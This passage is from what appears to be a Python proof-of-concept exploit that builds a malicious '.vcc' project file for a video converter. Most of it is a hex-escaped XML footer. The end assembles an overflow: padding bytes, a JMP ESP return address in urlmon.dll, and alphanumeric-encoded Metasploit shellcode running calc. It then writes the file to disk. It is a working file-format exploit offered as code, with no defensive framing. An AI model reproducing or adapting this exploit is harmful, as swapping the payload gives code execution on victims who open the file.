"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x63\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f"
"\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74\x65\x72\x6e\x4e\x61\x6d"
"\x65\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x46\x6f\x6c\x64\x65"
"\x72\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x46\x6f"
"\x6c\x64\x65\x72\x3e\x0d\x0a\x3c\x53\x6b\x69\x70\x52\x61\x6e\x67"
"\x65\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x6b\x69\x70\x52\x61\x6e\x67\x65"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x49\x74\x65"
"\x6d\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x49\x74\x65\x6d"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x41\x75\x64\x69\x6f\x53\x74\x72"
"\x65\x61\x6d\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x41\x75\x64\x69\x6f"
"\x53\x74\x72\x65\x61\x6d\x3e\x0d\x0a\x3c\x49\x6e\x63\x6c\x75\x64"
"\x65\x43\x68\x61\x70\x74\x65\x72\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x49\x6e\x63\x6c\x75\x64\x65\x43\x68\x61\x70\x74\x65\x72\x3e\x0d"
"\x0a\x3c\x55\x73\x65\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x73\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x55\x73\x65\x53\x75\x62\x46\x6f\x6c"
"\x64\x65\x72\x73\x3e\x0d\x0a\x3c\x2f\x50\x61\x74\x68\x54\x6f\x4d"
"\x65\x64\x69\x61\x46\x69\x6c\x65\x3e\x0d\x0a\x3c\x2f\x46\x49\x4c"
"\x45\x53\x3e\x0d\x0a\x3c\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x4d\x6f\x64\x65\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x75"
"\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e\x61\x6d\x65\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x44\x65\x73\x74\x69\x6e\x61\x74\x69"
"\x6f\x6e\x50\x61\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x44\x65\x73"
"\x74\x69\x6e\x61\x74\x69\x6f\x6e\x50\x61\x74\x68\x3e\x0d\x0a\x3c"
"\x46\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x73\x5f\x63\x6f\x70\x79\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x79"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f\x63"
"\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f\x46"
"\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x3e\x0d"
"\x0a\x3c\x49\x73\x53\x70\x6c\x69\x74\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x3e\x0d\x0a\x3c\x53\x70"
"\x6c\x69\x74\x4c\x65\x6e\x67\x74\x68\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x31\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78"
"\x74\x3d\x27\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4c\x65\x6e\x67\x74"
"\x68\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x42\x79\x53\x69\x7a\x65"
"\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69"
"\x74\x42\x79\x53\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x53"
"\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74\x50\x61\x72\x74\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74"
"\x50\x61\x72\x74\x73\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x4d\x61"
"\x78\x53\x69\x7a\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x36\x30\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4d\x61\x78\x53\x69\x7a\x65\x3e"
"\x0d\x0a\x3c\x45\x78\x61\x63\x74\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x45\x78\x61\x63\x74\x6c\x79\x3e\x0d\x0a\x3c\x2f\x49\x73"
"\x53\x70\x6c\x69\x74\x3e\x0d\x0a\x3c\x4a\x6f\x69\x6e\x53\x75\x62"
"\x54\x69\x6d\x65\x4c\x69\x6e\x65\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4a\x6f\x69\x6e\x53\x75\x62\x54\x69\x6d\x65\x4c\x69\x6e\x65\x3e"
"\x0d\x0a\x3c\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x3e\x0d\x0a\x3c\x2f"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x52\x6f\x6f\x74\x5f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69"
"\x76\x65\x46\x72\x61\x6d\x65\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73"
"\x65\x72\x74\x45\x76\x65\x72\x79\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x32\x35\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65"
"\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73\x65\x72\x74\x45\x76\x65\x72"
"\x79\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x77\x65"
"\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x52\x6f\x6f\x74\x5f"
"\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x3e"
"\x0d\x0a\x3c\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69\x6c"
"\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69"
"\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62\x6e"
"\x61\x69\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d"
"\x62\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f"
"\x6e\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x46\x69\x6c\x65\x46\x6f\x72\x6d\x61\x74"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x7b\x31\x41\x44\x43\x33\x33\x42"
"\x39\x2d\x35\x39\x36\x44\x2d\x34\x33\x30\x43\x2d\x42\x35\x39\x41"
"\x2d\x36\x44\x37\x37\x41\x42\x43\x42\x35\x46\x44\x39\x7d\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x37\x32\x27\x3e\x0d\x0a\x3c\x47\x49\x46"
"\x41\x3e\x0d\x0a\x3c\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x50\x61\x6c"
"\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f"
"\x72\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x38\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x73"
"\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x3e\x0d\x0a\x3c"
"\x2f\x50\x61\x6c\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c"
"\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x3c\x46\x72\x61"
"\x6d\x65\x44\x65\x6c\x61\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x31"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x30\x6d\x73\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x44\x65\x6c\x61\x79"
"\x3e\x0d\x0a\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x52\x65\x70\x65\x74\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74\x52\x65\x70\x65"
"\x74\x3e\x0d\x0a\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x2f\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d"
"\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61"
"\x6d\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75"
"\x6e\x74\x53\x6b\x69\x70\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43"
"\x6f\x75\x6e\x74\x53\x6b\x69\x70\x3e\x0d\x0a\x3c\x46\x72\x61\x6d"
"\x65\x50\x61\x74\x74\x65\x72\x6e\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x3b\x35\x3b\x37\x3b\x32\x35\x3b\x33\x32\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x50"
"\x61\x74\x74\x65\x72\x6e\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x53\x6f\x75\x72\x63\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d"
"\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x46\x72\x61"
"\x6d\x65\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74"
"\x46\x72\x61\x6d\x65\x73\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f"
"\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x3e\x0d"
"\x0a\x3c\x2f\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74"
"\x65\x72\x73\x3e\x0d\x0a\x3c\x53\x69\x7a\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x26\x6c\x74\x3b\x73\x6f\x75\x72\x63\x65\x26\x67\x74"
"\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x72\x69\x67\x69"
"\x6e\x61\x6c\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4f\x72\x69\x67\x69\x6e\x61\x6c\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x3e\x0d\x0a"
"\x3c\x2f\x53\x69\x7a\x65\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x44"
"\x65\x70\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x35\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f"
"\x72\x44\x65\x70\x74\x68\x3e\x0d\x0a\x3c\x43\x72\x6f\x70\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x26\x6c\x74\x3b\x6e\x6f\x6e\x65\x26\x67"
"\x74\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c"
"\x2f\x43\x72\x6f\x70\x3e\x0d\x0a\x3c\x57\x61\x74\x65\x72\x4d\x61"
"\x72\x6b\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x57\x61\x74\x65\x72\x4d"
"\x61\x72\x6b\x3e\x0d\x0a\x3c\x46\x69\x6c\x74\x65\x72\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x69\x6c\x74\x65\x72\x73\x3e\x0d\x0a\x3c"
"\x2f\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f\x47"
"\x49\x46\x41\x3e\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x46\x69"
"\x6c\x65\x46\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b"
"\x44\x69\x72\x73\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b\x44\x69\x72\x45"
"\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x73\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d"
"\x0a\x3c\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65"
"\x72\x6e\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61"
"\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62"
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]
payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x69\x78" +
"\x4d\x59\x37\x70\x63\x30\x55\x50\x51\x70\x6b\x39\x38\x65" +
"\x76\x51\x38\x52\x73\x54\x4e\x6b\x32\x72\x46\x50\x6c\x4b" +
"\x43\x62\x74\x4c\x6c\x4b\x32\x72\x74\x54\x6c\x4b\x74\x32" +
"\x37\x58\x56\x6f\x4f\x47\x52\x6a\x65\x76\x66\x51\x49\x6f" +
"\x36\x51\x39\x50\x4e\x4c\x37\x4c\x35\x31\x43\x4c\x57\x72" +
"\x56\x4c\x61\x30\x4f\x31\x4a\x6f\x46\x6d\x67\x71\x68\x47" +
"\x6d\x32\x68\x70\x43\x62\x53\x67\x6e\x6b\x56\x32\x62\x30" +
"\x4e\x6b\x72\x62\x55\x6c\x45\x51\x6e\x30\x4e\x6b\x61\x50" +
"\x70\x78\x6b\x35\x6f\x30\x63\x44\x63\x7a\x33\x31\x6a\x70" +
"\x70\x50\x4c\x4b\x62\x68\x65\x48\x6c\x4b\x33\x68\x37\x50" +
"\x47\x71\x39\x43\x6b\x53\x35\x6c\x77\x39\x4c\x4b\x34\x74" +
"\x6e\x6b\x73\x31\x6a\x76\x50\x31\x49\x6f\x55\x61\x4b\x70" +
"\x6e\x4c\x69\x51\x5a\x6f\x74\x4d\x56\x61\x5a\x67\x35\x68" +
"\x6b\x50\x33\x45\x38\x74\x57\x73\x33\x4d\x59\x68\x75\x6b" +
"\x31\x6d\x34\x64\x44\x35\x4b\x52\x31\x48\x4c\x4b\x46\x38" +
"\x65\x74\x77\x71\x6a\x73\x35\x36\x6e\x6b\x56\x6c\x30\x4b" +
"\x4c\x4b\x62\x78\x77\x6c\x35\x51\x59\x43\x6c\x4b\x33\x34" +
"\x4c\x4b\x73\x31\x6e\x30\x6b\x39\x72\x64\x44\x64\x75\x74" +
"\x43\x6b\x51\x4b\x65\x31\x52\x79\x62\x7a\x53\x61\x6b\x4f" +
"\x69\x70\x56\x38\x33\x6f\x73\x6a\x4c\x4b\x64\x52\x38\x6b" +
"\x6b\x36\x43\x6d\x51\x7a\x63\x31\x6c\x4d\x6c\x45\x68\x39" +
"\x57\x70\x47\x70\x45\x50\x32\x70\x55\x38\x54\x71\x4e\x6b" +
"\x50\x6f\x6f\x77\x4b\x4f\x59\x45\x6f\x4b\x58\x70\x6c\x75" +
"\x4f\x52\x43\x66\x70\x68\x6e\x46\x6e\x75\x6f\x4d\x4f\x6d" +
"\x4b\x4f\x59\x45\x75\x6c\x47\x76\x33\x4c\x55\x5a\x4d\x50" +
"\x6b\x4b\x59\x70\x64\x35\x73\x35\x6f\x4b\x73\x77\x35\x43" +
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload += "\x41" * (buffersize - len(payload)) 
sploit = header + payload  + footer
 
print "[*] Creating .vcc file"
 
try:
	print "[+]Creating Exploit File...\n"
	file = open("noname1.vcc","wb") 
	file.write(sploit)
	file.close
	print "[+]File noname1.vcc create successfully.\n"
except:	
	print "**[-]Error: #{$!}\n"